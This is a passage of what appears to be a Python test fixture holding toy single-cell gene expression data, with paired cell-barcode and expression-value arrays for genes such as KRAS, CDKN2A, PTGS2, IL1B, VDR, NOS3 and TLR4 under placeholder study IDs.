2.81,
2.0,
2.58,
2.32,
1.0,
1.0,
1.0,
2.58,
1.0,
2.81,
2.81,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"KRAS Cells": {
"name": "KRAS Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB6_BazMoo_1ABAADCDCBDDACAB-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB7_BazMoo_4DDBADDACABDABDD-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB5_BazMoo_3DADDDCACDABCDCB-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB4_BazMoo_2ACAADBCBDDADADB-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB2_BazMoo_2DDCCBAACDCCADBB-1",
"FoobarAB5_BazMoo_4CDCACCCBDBADABB-1",
"FoobarAB8_BazMoo_4CBABCDBBDBCBCCA-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB8_BazMoo_5CDDADACBAAACBAA-1",
"FoobarAB1_BazMoo_1CDBDADAAACBAABD-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB8_BazMoo_4BADABCDBDBDACAB-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB4_BazMoo_3DBCDBDBDCDDCCAB-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB2_BazMoo_5CAAADCADACBDDCA-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB6_BazMoo_1DCACCBBDBBBBCBB-1",
"FoobarAB3_BazMoo_2ADDBAAACCDDDDAA-1",
"FoobarAB1_BazMoo_5AABDACBCCBCABDD-1",
"FoobarAB4_BazMoo_1CCACCABBBDABDCB-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"KRAS Expression": {
"name": "KRAS Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.81,
2.81,
1.58,
1.58,
1.0,
2.0,
3.0,
2.32,
3.0,
1.0,
1.0,
1.0,
2.0,
1.58,
3.0,
1.0,
1.58,
2.32,
2.32,
1.0,
2.81,
3.0,
2.58,
2.81,
2.32,
3.0,
3.0,
2.32,
2.32,
2.58,
1.0,
3.0,
2.58,
2.58,
1.0,
3.0,
2.58,
3.0,
3.0,
2.81,
3.0,
2.58,
2.32,
1.0,
1.58,
3.0,
1.0,
3.0,
1.0,
2.32,
2.58,
1.0,
1.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CDKN2A Cells": {
"name": "CDKN2A Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB3_BazMoo_7ACACAAADCCDBADA-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB3_BazMoo_7BDDDBCADACBDDBC-1",
"FoobarAB8_BazMoo_4BDABCDCCBABACCC-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB7_BazMoo_4DDBADDACABDABDD-1",
"FoobarAB6_BazMoo_7CBBCDBADBBBABDA-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB7_BazMoo_4ABDBBBACBCCBDAA-1",
"FoobarAB2_BazMoo_3BBDDCADCDACDABD-1",
"FoobarAB2_BazMoo_3DABAABDAAAABAAB-1",
"FoobarAB5_BazMoo_4CDCACCCBDBADABB-1",
"FoobarAB2_BazMoo_2DCDCDBCBABDBBAD-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB4_BazMoo_3BBADCDAABADCAAB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB1_BazMoo_3DBBCDAABDACBCBB-1",
"FoobarAB7_BazMoo_5ADBBAAABBCCBABB-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB1_BazMoo_1DACACBDDADCCACC-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB5_BazMoo_6BCBABACCCDACDBB-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB2_BazMoo_1ACCDADBABBACBCA-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB1_BazMoo_3BBCCABDADCDBCCB-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB6_BazMoo_6CACDAABBDDBCBDA-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB2_BazMoo_5DBCDDBABCAAADDB-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB6_BazMoo_1DBBAADCDAADBCDC-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB5_BazMoo_2CADBCDABDDCCCBD-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CDKN2A Expression": {
"name": "CDKN2A Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.32,
2.58,
3.0,
2.81,
2.58,
2.58,
2.0,
2.0,
1.58,
1.0,
1.0,
1.58,
2.58,
2.32,
2.58,
2.0,
2.58,
1.58,
3.0,
2.58,
2.0,
2.81,
2.81,
2.58,
1.0,
3.0,
2.0,
2.32,
3.0,
2.0,
2.81,
2.32,
2.81,
2.81,
2.0,
1.58,
1.0,
3.0,
2.32,
2.58,
2.58,
1.0,
1.58,
2.32,
2.32,
1.0,
3.0,
2.0,
1.58,
3.0,
3.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"PTGS2 Cells": {
"name": "PTGS2 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB8_BazMoo_4BDABCDCCBABACCC-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB2_BazMoo_6ABBADACDCDDBCAC-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB2_BazMoo_4AACCAACBCBAACDD-1",
"FoobarAB6_BazMoo_2DDDCABCCCDBDDAC-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB2_BazMoo_3BBDDCADCDACDABD-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB8_BazMoo_5CDDADACBAAACBAA-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB5_BazMoo_8ABDADBBCADAABDD-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB3_BazMoo_7DBDCDADBAAAABCD-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB3_BazMoo_2CDDCABDDCCACCBA-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB5_BazMoo_6BCBABACCCDACDBB-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB2_BazMoo_5CAAADCADACBDDCA-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB1_BazMoo_8CBDADBABACDADAC-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB2_BazMoo_1CABADDBCABBCBBA-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB6_BazMoo_1DBBAADCDAADBCDC-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB6_BazMoo_4DAACBADBACABADC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"PTGS2 Expression": {
"name": "PTGS2 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.0,
3.0,
1.58,
1.58,
2.58,
2.81,
1.58,
2.32,
2.32,
2.0,
2.0,
1.0,
2.81,
2.81,
1.0,
3.0,
2.0,
3.0,
1.58,
1.0,
2.58,
2.58,
2.58,
1.0,
1.58,
1.58,
2.32,
3.0,
2.81,
2.32,
3.0,
2.58,
2.32,
2.0,
2.58,
1.58,
1.58,
1.58,
2.58,
2.58,
1.58,
2.0,
2.58,
2.32,
1.0,
2.32,
1.58,
2.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"IL1B Cells": {
"name": "IL1B Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB7_BazMoo_6ABADABDAABBCDDB-1",
"FoobarAB6_BazMoo_2DDDCABCCCDBDDAC-1",
"FoobarAB2_BazMoo_2DDCCBAACDCCADBB-1",
"FoobarAB1_BazMoo_3DCABADBDAADDCBD-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB2_BazMoo_8DDABDBCDABBBDAA-1",
"FoobarAB8_BazMoo_5CDDADACBAAACBAA-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB5_BazMoo_3BDBBDDDDDBBABAC-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB8_BazMoo_4BADABCDBDBDACAB-1",
"FoobarAB1_BazMoo_3DBBCDAABDACBCBB-1",
"FoobarAB8_BazMoo_7CBCDDADACDDACAA-1",
"FoobarAB3_BazMoo_1DBABCBBAABBABBB-1",
"FoobarAB2_BazMoo_8CCDBBDCCBBACDCB-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB2_BazMoo_5DCCBDBABBDACAAB-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB2_BazMoo_5DBCDDBABCAAADDB-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"IL1B Expression": {
"name": "IL1B Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
3.0,
2.58,
2.32,
2.0,
2.81,
2.32,
1.0,
1.0,
3.0,
2.81,
1.58,
2.32,
2.58,
2.0,
2.0,
2.32,
2.58,
1.58,
1.0,
2.58,
3.0,
2.81,
1.58,
2.58,
1.58,
2.58,
1.58,
1.0,
1.0,
2.58,
1.58,
1.58,
1.0,
1.0,
3.0,
2.58,
2.58,
2.58,
2.0,
1.58,
1.0,
1.58,
3.0,
2.81,
2.0,
2.32,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"VDR Cells": {
"name": "VDR Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_5ABCBACBDABBADAC-1",
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB3_BazMoo_7ACACAAADCCDBADA-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB7_BazMoo_4DDBADDACABDABDD-1",
"FoobarAB6_BazMoo_7CBBCDBADBBBABDA-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB7_BazMoo_6ABADABDAABBCDDB-1",
"FoobarAB1_BazMoo_3DCABADBDAADDCBD-1",
"FoobarAB6_BazMoo_4ACBACBAACAAADAD-1",
"FoobarAB2_BazMoo_8DDABDBCDABBBDAA-1",
"FoobarAB1_BazMoo_3BCBBBCBCDDCBDAB-1",
"FoobarAB5_BazMoo_6AABBDADDABCDDCD-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB3_BazMoo_8CBDABBAAAAADBCD-1",
"FoobarAB4_BazMoo_4DDBADBCBACBDCDA-1",
"FoobarAB1_BazMoo_1DACACBDDADCCACC-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB7_BazMoo_7ACADCDBAABAACBD-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB4_BazMoo_2AABBAAABCBBACBB-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB1_BazMoo_3BBCCABDADCDBCCB-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB2_BazMoo_5CAAADCADACBDDCA-1",
"FoobarAB4_BazMoo_7BADBDDCACBDCCCC-1",
"FoobarAB4_BazMoo_3BCADDCAAACBADBC-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB1_BazMoo_5AABDACBCCBCABDD-1",
"FoobarAB2_BazMoo_5DBCDDBABCAAADDB-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB3_BazMoo_3DABBDCBDACACCCC-1",
"FoobarAB6_BazMoo_1DBBAADCDAADBCDC-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB3_BazMoo_8AAABDDBDDCBDDAB-1",
"FoobarAB5_BazMoo_2CADBCDABDDCCCBD-1",
"FoobarAB3_BazMoo_5DDBDBBBCBDBBBCD-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"VDR Expression": {
"name": "VDR Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
3.0,
2.58,
2.0,
2.58,
1.0,
1.0,
1.58,
2.81,
3.0,
2.81,
2.0,
2.32,
2.32,
1.58,
2.58,
2.58,
2.58,
1.58,
2.0,
1.58,
1.0,
1.58,
1.58,
1.0,
2.81,
2.0,
2.58,
3.0,
3.0,
1.0,
2.32,
1.0,
2.81,
2.32,
2.81,
3.0,
1.0,
3.0,
2.32,
2.0,
1.58,
2.0,
2.0,
1.58,
2.32,
2.58,
1.0,
2.81,
2.81,
3.0,
2.58,
2.32,
2.81,
2.32,
2.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"NOS3 Cells": {
"name": "NOS3 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB6_BazMoo_1ABAADCDCBDDACAB-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB2_BazMoo_6ABBADACDCDDBCAC-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB6_BazMoo_1ACCBABCADDCBAAC-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB2_BazMoo_3BBDDCADCDACDABD-1",
"FoobarAB6_BazMoo_4ACBACBAACAAADAD-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB8_BazMoo_8ADAABACBACDDCAB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB4_BazMoo_1DADCDAADADACBDD-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB7_BazMoo_5ADBBAAABBCCBABB-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB1_BazMoo_6BADACADACADCDDD-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB2_BazMoo_8DBCDDCCAACDDDCB-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB2_BazMoo_1ACCDADBABBACBCA-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB3_BazMoo_2ADDBAAACCDDDDAA-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB1_BazMoo_5AABDACBCCBCABDD-1",
"FoobarAB1_BazMoo_8DDCCAABADABCACC-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB1_BazMoo_4DDDCDCCABBDDABD-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB2_BazMoo_7DABDADBDBADACDB-1",
"FoobarAB5_BazMoo_2DDBCCDBADBADCBC-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
"FoobarAB2_BazMoo_3BCDCBCCBCCCCBAC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"NOS3 Expression": {
"name": "NOS3 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.58,
2.32,
2.58,
1.58,
3.0,
1.58,
1.0,
2.81,
3.0,
2.32,
2.58,
2.58,
2.58,
1.0,
1.0,
1.58,
1.58,
2.0,
2.58,
2.0,
2.0,
2.32,
2.58,
1.0,
2.0,
1.0,
2.32,
2.58,
2.32,
1.58,
2.81,
3.0,
2.58,
3.0,
2.0,
1.0,
2.0,
2.32,
2.32,
1.58,
2.81,
2.81,
2.81,
3.0,
1.58,
2.32,
2.81,
2.0,
2.32,
2.81,
2.58,
2.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"TLR4 Cells": {
"name": "TLR4 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_5ABCBACBDABBADAC-1",
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB5_BazMoo_5BBDADACAABADAAB-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB3_BazMoo_7BDDDBCADACBDDBC-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB6_BazMoo_7CBBCDBADBBBABDA-1",
"FoobarAB8_BazMoo_6CBCADAABADDCCBC-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB2_BazMoo_1AADDCCADACBADAD-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB4_BazMoo_6CADCBCCBCDACDBD-1",
"FoobarAB8_BazMoo_3CCABBAABDCCBDCB-1",
"FoobarAB1_BazMoo_3DCABADBDAADDCBD-1",
"FoobarAB8_BazMoo_4CBABCDBBDBCBCCA-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB2_BazMoo_8DDABDBCDABBBDAA-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB1_BazMoo_5DDADDBCDDDCDABB-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB1_BazMoo_3BCBBBCBCDDCBDAB-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB3_BazMoo_1DBABCBBAABBABBB-1",
"FoobarAB7_BazMoo_5ADBBAAABBCCBABB-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB5_BazMoo_6BCBABACCCDACDBB-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
